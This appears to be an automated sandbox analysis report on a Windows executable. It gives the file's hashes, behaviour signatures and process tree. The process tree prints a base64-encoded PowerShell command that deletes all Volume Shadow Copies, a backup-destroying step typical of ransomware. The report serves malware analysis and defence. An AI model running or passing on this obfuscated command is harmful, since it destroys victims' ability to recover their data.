Analysis

  • max time kernel
    142s
  • max time network
    31s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    01-02-2021 09:58

General

  • Target

    801e1f5f623edd2771367a79c94c8d9414f2d8f6af5cec707baa410a1ebf4b75.exe

  • Size

    136KB

  • MD5

    c2ae29ea86b611d8697ca715e61045a8

  • SHA1

    58d835c3d204d012ee5a4e3c05a06e60b4316d0e

  • SHA256

    801e1f5f623edd2771367a79c94c8d9414f2d8f6af5cec707baa410a1ebf4b75

  • SHA512

    571dde42ebaa5c373bcd1cd8c08e3d4d16945df54659f64ccb0e8e1bf721c11d20ac35539e071dfede3a765d2abfd6546225fb72822fa1e3e4095459b539822a

Score
6/10

Malware Config

Signatures

  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\801e1f5f623edd2771367a79c94c8d9414f2d8f6af5cec707baa410a1ebf4b75.exe
    "C:\Users\Admin\AppData\Local\Temp\801e1f5f623edd2771367a79c94c8d9414f2d8f6af5cec707baa410a1ebf4b75.exe"
    1⤵
    • Enumerates connected drives
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1064
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1568
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:808
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1532

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/1064-2-0x0000000076101000-0x0000000076103000-memory.dmp
      Filesize

      8KB

    • memory/1568-3-0x0000000000000000-mapping.dmp
    • memory/1568-4-0x000007FEFB7F1000-0x000007FEFB7F3000-memory.dmp
      Filesize

      8KB

    • memory/1568-5-0x000007FEF4F60000-0x000007FEF594C000-memory.dmp
      Filesize

      9.9MB

    • memory/1568-6-0x00000000023B0000-0x00000000023B1000-memory.dmp
      Filesize

      4KB

    • memory/1568-7-0x000000001AAE0000-0x000000001AAE1000-memory.dmp
      Filesize

      4KB

    • memory/1568-8-0x00000000025F0000-0x00000000025F1000-memory.dmp
      Filesize

      4KB

    • memory/1568-10-0x000000001AA64000-0x000000001AA66000-memory.dmp
      Filesize

      8KB

    • memory/1568-9-0x000000001AA60000-0x000000001AA62000-memory.dmp
      Filesize

      8KB

    • memory/1568-11-0x0000000001EC0000-0x0000000001EC1000-memory.dmp
      Filesize

      4KB

    • memory/1568-12-0x000000001B770000-0x000000001B771000-memory.dmp
      Filesize

      4KB